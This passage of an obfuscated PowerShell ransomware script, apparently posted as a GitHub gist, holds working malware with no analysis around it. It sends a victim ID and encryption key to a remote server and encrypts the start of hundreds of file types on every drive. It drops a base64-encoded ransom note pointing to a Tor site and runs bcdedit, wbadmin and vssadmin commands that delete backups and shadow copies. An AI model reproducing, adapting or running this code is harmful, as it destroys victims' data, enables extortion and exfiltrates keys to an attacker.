$vbfugzsg.Description = 'Windows Application Service';
$vbfugzsg.Save();
}
}catch{};
}
}catch{}
};
function iecvbwwczy( $bathwxwh ){
$ewcgzjzct = New-Object System.Net.WebClient;
$ewcgzjzct.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$ewcgzjzct.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$ewcgzjzct.Encoding = [System.Text.Encoding]::UTF8;
try{
$xitzjey = $ewcgzjzct.UploadString( "http://food.kkphd.com/", ("ver=1018.1&vid=ln2&" + $bathwxwh) );
if( $xitzjey -eq "ok" ){ return $true; }
}catch{};
return $false;
};
function itjwhvw( $vbaaubjx ){
try { Start-Process -WindowStyle Hidden -FilePath "$env:comspec" -ArgumentList "/c $vbaaubjx" ; }catch{}
};
function ufhysju($higyvxhevi, $ffahsbu, $hutystzzce, $dgiyvexjxd ){
$cbsgjcstsv = new-Object System.Security.Cryptography.RijndaelManaged;
$jvfaedbv = [Text.Encoding]::UTF8.GetBytes($ffahsbu);
$hutystzzce = [Text.Encoding]::UTF8.GetBytes($hutystzzce);
$cbsgjcstsv.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $jvfaedbv, $hutystzzce, "SHA1", 5).GetBytes(32);
$cbsgjcstsv.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($dgiyvexjxd) )[0..15];
$cbsgjcstsv.Padding="Zeros";
$cbsgjcstsv.Mode="CBC";
$xhbcevyg = $cbsgjcstsv.CreateEncryptor();
$txhgcxzt = new-Object IO.MemoryStream;
$hgdxjdbuc = new-Object Security.Cryptography.CryptoStream $txhgcxzt,$xhbcevyg,"Write";
$hgdxjdbuc.Write($higyvxhevi, 0,$higyvxhevi.Length);
$hgdxjdbuc.Close();
$txhgcxzt.Close();
$cbsgjcstsv.Clear();
return $txhgcxzt.ToArray();
}
function djceuyxwzc{
[Reflection.Assembly]::LoadWithPartialName('System.Security');
$djivxvyaz = $env:PUBLIC + "\OracleKit";
if (-not (Test-Path $djivxvyaz)) { md $djivxvyaz; }
$yfatvywzy = $env:temp + "\quanto00.tmp";
if ( Test-Path $yfatvywzy ){
if ( ( ( NEW-TIMESPAN -Start ((Get-ChildItem $yfatvywzy ).CreationTime) -End (Get-Date)).Minutes ) -gt 30 ){
sc -Path $yfatvywzy -Value $(Get-Date);
}else{
exit;
};
};
$cdxzybuhxz = $djivxvyaz + "\w00log03.tmp";
if ( Test-Path $cdxzybuhxz ){
$xedvfcu = [string](get-content $cdxzybuhxz);
if( $xedvfcu.length -ne 36 ){
$xedvfcu=[string][guid]::NewGuid();
sc -Path $cdxzybuhxz -Value $xedvfcu -Force;
}
}else{
$xedvfcu=[string][guid]::NewGuid();
sc -Path $cdxzybuhxz -Value $xedvfcu -Force;
}
gi $cdxzybuhxz -Force | %{ $_.Attributes = "Hidden" };
$fsysexviu = ([string][guid]::NewGuid()).Substring(0,6);
$dvxhgfdx = (get-random -count 50 -input (48..57 + 65..90 + 97..122) | foreach-object -begin { $pass = $null } -process {$pass += [char]$_} -end {$pass});
$hutystzzce="BXCODE hack your system";
$dgiyvexjxd="BXCODE INIT";
$all = $dvxhgfdx + ";" + $hutystzzce + ";" + $dgiyvexjxd;
[byte[]]$ysuxhzbiw = [system.Text.Encoding]::Unicode.GetBytes( $dvxhgfdx );
[byte[]]$gjxhvjaycf = [system.Text.Encoding]::Unicode.GetBytes( $hutystzzce + ";" + $dgiyvexjxd );
$gsxtxbsdah = New-Object System.Security.Cryptography.RSACryptoServiceProvider(1024);
$gsxtxbsdah.ImportCspBlob( [system.Convert]::FromBase64String( 'BgIAAACkAABSU0ExAAQAAAEAAQD11Onrt4plHuT75QS2+sC7J05SPYBQkrmT6FbgHLdw7GyJeZzO8yJRiXXIaHy5FGa9XviwqfBowCs7r6zmvHjfjFbN4YjeRIWsSU5JoEcl8j/H1KZJ7VQfqgSo+u0HfDB8nVcWgPOlaNA4VF+PU2p9x8pwa5xb7bR6grkRLG7Unw==' ) );
$biwieabzbc = [system.Convert]::ToBase64String( $gsxtxbsdah.Encrypt($ysuxhzbiw , $false) );
$buhcgxywu = [system.Convert]::ToBase64String( $gsxtxbsdah.Encrypt($gjxhvjaycf , $false) );
$fbyvdxgvyt = iecvbwwczy ("guid=$xedvfcu&ext=$fsysexviu&ek=$dvxhgfdx&r1=" + ( [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( ( $biwieabzbc +";" + $buhcgxywu ) ) ) ) +"&");
if( $fbyvdxgvyt ){
sc -Path $yfatvywzy -Value $(Get-Date);
}else{
ri -Path $yfatvywzy -Force;
exit;
}
$ziggicvseg = 'PGgxPkFsbCB5b3VyIGZpbGVzIHdhcyBlbmNyeXB0ZWQhPC9oMT4NCiAgPGgyICBzdHlsZT0nY29sb3I6cmVkJz48Yj5ZZXMsIFlvdSBjYW4gRGVjcnlwdCBGaWxlcyBFbmNyeXB0ZWQhISE8L2I+PC9oMj4NCiAgPHA+WW91ciBwZXJzb25hbCBJRDogPGI+JWd1aWQlPC9iPjwvcD4NCiAgPHA+MS4gRG93bmxvYWQgVG9yIGJyb3dzZXIgLSA8YSBocmVmPSdodHRwczovL3d3dy50b3Jwcm9qZWN0Lm9yZy9kb3dubG9hZC8nPmh0dHBzOi8vd3d3LnRvcnByb2plY3Qub3JnL2Rvd25sb2FkLzwvYT48L3A+DQogIDxwPjIuIEluc3RhbGwgVG9yIGJyb3dzZXI8L3A+DQogIDxwPjMuIE9wZW4gVG9yIEJyb3dzZXI8L3A+DQogIDxwPjQuIE9wZW4gbGluayBpbiBUT1IgYnJvd3NlcjogIDxiPmh0dHA6Ly9xdm81c2Q3cDV5YXp3YnJnaW9reTdyZHU0dnNseHJjYWVydWhqcjd6dG4zdDJwaWhwNTZld2xxZC5vbmlvbi8/Z3VpZD0lZ3VpZCU8L2I+PC9wPg0KICA8cD41LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGlzIHBhZ2U8L3A+DQogIDxoMj4qKioqKiBXYXJuaW5nKioqKio8L2gyPg0KICA8cD5EbyBub3QgcmVuYW1lIGZpbGVzPC9wPg0KICA8cD5EbyBub3QgdHJ5IHRvIGJhY2sgeW91ciBkYXRhIHVzaW5nIHRoaXJkLXBhcnR5IHNvZnR3YXJlLCBpdCBtYXkgY2F1c2UgcGVybWFuZW50IGRhdGEgbG9zcyhJZiB5b3UgZG8gbm90IGJlbGlldmUgdXMsIGFuZCBzdGlsbCB0cnkgdG8gLSBtYWtlIGNvcGllcyBvZiBhbGwgZmlsZXMgc28gdGhhdCB3ZSBjYW4gaGVscCB5b3UgaWYgdGhpcmQtcGFydHkgcw0Kb2Z0d2FyZSBoYXJtcyB0aGVtKTwvcD4NCiAgPHA+QXMgZXZpZGVuY2UsIHdlIGNhbiBmb3IgZnJlZSBiYWNrIG9uZSBmaWxlPC9wPg0KICA8cD5EZWNvZGVycyBvZiBvdGhlciB1c2VycyBpcyBub3Qgc3VpdGFibGUgdG8gYmFjayB5b3VyIGZpbGVzIC0gZW5jcnlwdGlvbiBrZXkgaXMgY3JlYXRlZCBvbiB5b3VyIGNvbXB1dGVyIHdoZW4gdGhlIHByb2dyYW0gaXMgbGF1bmNoZWQgLSBpdCBpcyB1bmlxdWUuPC9wPg0KICA=';
$ziggicvseg = ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( $ziggicvseg ) ) -replace "%guid%", $xedvfcu );
$fvjfhbxze = 0;
iecvbwwczy ("guid=$xedvfcu&status=start" );
$gifxfejtb = "windows|temp|Recycle|intel|OEM|Program Files|ProgramData";
$gvvwgib = Get-PSDrive|Where-Object {$_.Free -gt 50000}|Sort-Object -Descending;
foreach($bebegty in $gvvwgib){
try {
gci $bebegty.root -Recurse -Include "*.sql","*.mp4","*.7z","*.rar","*.m4a","*.wma","*.avi","*.wmv","*.csv","*.d3dbsp","*.zip","*.sie","*.sum","*.ibank","*.t13","*.t12","*.qdf","*.gdb","*.tax","*.pkpass","*.bc6","*.bc7","*.bkp","*.qic","*.bkf","*.sidn","*.sidd","*.mddata","*.itl","*.itdb","*.icxs","*.hvpl","*.hplg","*.hkdb","*.mdbackup","*.syncdb","*.gho","*.cas","*.svg","*.map","*.wmo","*.itm","*.sb","*.fos","*.mov","*.vdf","*.ztmp","*.sis","*.sid","*.ncf","*.menu","*.layout","*.dmp","*.blob","*.esm","*.vcf","*.vtf","*.dazip","*.fpk","*.mlx","*.kf","*.iwd","*.vpk","*.tor","*.psk","*.rim","*.w3x","*.fsh","*.ntl","*.arch00","*.lvl","*.snx","*.cfr","*.ff","*.vpp_pc","*.lrf","*.m2","*.mcmeta","*.vfs0","*.mpqge","*.kdb","*.db0","*.dba","*.rofl","*.hkx","*.bar","*.upk","*.das","*.iwi","*.litemod","*.asset","*.forge","*.ltx","*.bsa","*.apk","*.re4","*.sav","*.lbf","*.slm","*.bik","*.epk","*.rgss3a","*.pak","*.big","*wallet","*.wotreplay","*.xxx","*.desc","*.py","*.m3u","*.flv","*.js","*.css","*.rb","*.png","*.jpeg","*.txt","*.p7c","*.p7b","*.p12","*.pfx","*.pem","*.crt","*.cer","*.der","*.x3f","*.srw","*.pef","*.ptx","*.r3d","*.rw2","*.rwl","*.raw","*.raf","*.orf","*.nrw","*.mrwref","*.mef","*.erf","*.kdc","*.dcr","*.cr2","*.crw","*.bay","*.sr2","*.srf","*.arw","*.3fr","*.dng","*.jpe","*.jpg","*.cdr","*.indd","*.ai","*.eps","*.pdf","*.pdd","*.psd","*.dbf","*.mdf","*.wb2","*.rtf","*.wpd","*.dxg","*.xf","*.dwg","*.pst","*.accdb","*.mdb","*.pptm","*.pptx","*.ppt","*.xlk","*.xlsb","*.xlsm","*.xlsx","*.xls","*.wps","*.docm","*.docx","*.doc","*.odb","*.odc","*.odm","*.odp","*.ods","*.odt" -ErrorAction SilentlyContinue | %{
try {
if( $_.length -ne 0 ){
$iiydfvsej=[io.file]::Open($_, 'Open', 'ReadWrite');
if ($iiydfvsej.Length -lt "40960"){
$ucigxcs=$iiydfvsej.Length
}else{
$ucigxcs="40960"
}
[byte[]]$xjfxbizbxf = new-object byte[] $ucigxcs;
$swbcgts = $iiydfvsej.Read($xjfxbizbxf, 0, $xjfxbizbxf.Length);
$iiydfvsej.Position='0';
$ubixcuw = ufhysju $xjfxbizbxf $dvxhgfdx $hutystzzce $dgiyvexjxd ;
$iiydfvsej.Write($ubixcuw, 0, $ubixcuw.Length);
$iiydfvsej.Close();
$vsstbdv = $_.Name+".$fsysexviu";
try{ ren -Path $($_.FullName) -NewName $vsstbdv -Force; }catch{}
$cwafdcdy = $($_.DirectoryName + "\READ_ME_NOW.htm") ;
if(!(Test-Path $cwafdcdy)){
try{ sc -Path $cwafdcdy -Value $ziggicvseg -Force; }catch{}
try{ sc -Path $yfatvywzy -Value $(Get-Date) -Force; }catch{}
}
$fvjfhbxze++;
}
}catch{}
}
}catch{}
}
iecvbwwczy ("guid=$xedvfcu&status=done&res=" + $fvjfhbxze );
itjwhvw('bcdedit /set dhbyetxdv bootstatuspolicy ignoreallfailures');
itjwhvw('bcdedit /set dhbyetxdv recoveryenabled no');
itjwhvw('wbadmin delete catalog -quiet');
itjwhvw('wbadmin delete systemstatebackup');
itjwhvw('wbadmin delete backup');
itjwhvw('vssadmin delete shadows /all /quiet');
}
uiwhzhcwt;
djceuyxwzc;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment